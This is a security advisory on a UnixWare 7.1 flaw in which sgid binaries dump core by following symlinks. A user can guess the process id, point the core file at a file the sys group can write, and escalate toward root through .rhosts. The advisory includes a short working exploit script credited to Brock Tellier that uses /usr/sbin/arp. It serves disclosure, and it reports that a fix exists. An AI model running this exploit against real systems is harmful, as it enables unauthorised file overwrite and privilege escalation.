COMMAND

    coredumps (kernel)

SYSTEMS AFFECTED

    Unixware 7x, OpenServer

PROBLEM

    Brock Tellier found following.   All testing was done on  UnixWare
    7.1 though one would imagine 7.x is vulnerable as well. UnixWare's
    sgid binaries are allowed  to dump core (but  suids are not).   By
    "calculating" the  pid of  the sgid  binary we  will call,  we can
    create  a  symlink  from  ./core.pid  to  any  file which would be
    writable by  the running  group.   Many of  the sgid  binaries are
    sgid-sys, an  extremely sensitive  gid to  be able  to play around
    with.   arp  exploit  attached  below  demonstrates  how one would
    overwrite a file using this vulnerability.

    Why is a root compromise  possible?  Well, assuming that  we could
    somehow get "+ +"  on a line by  itself in the corefile,  we could
    place  this  into  the  .rhosts   file  of  some  group   writable
    directory/.rhosts.   Gaining  the  additional  privileges  of  any
    system account is usually a fast ticket to root.  Exploit follows:

        #!/bin/sh
        ####
        # Exploit for UnixWare 7.1 - sgid coredumps follow symlinks.
        # Guessing pid is trivial.  Any sgid program which will coredump can be used
        # -Brock Tellier, btellier@usa.net
        ####
        pid=`expr $$ + 4`;
        ln -s /path/to/sys/group/writable/file core.$pid
        /usr/sbin/arp `perl -e "print 'A' x 10000"`

SOLUTION

    OpenServer  does  not  have  same  exact vulnerability wrt s[ug]id
    programs allowed to  dump core but  but there are  vulnerabilities
    with programs that  were s[ug]id and  have relaxed it  and general
    issues of coredumping on symlinked names.  Fix is out.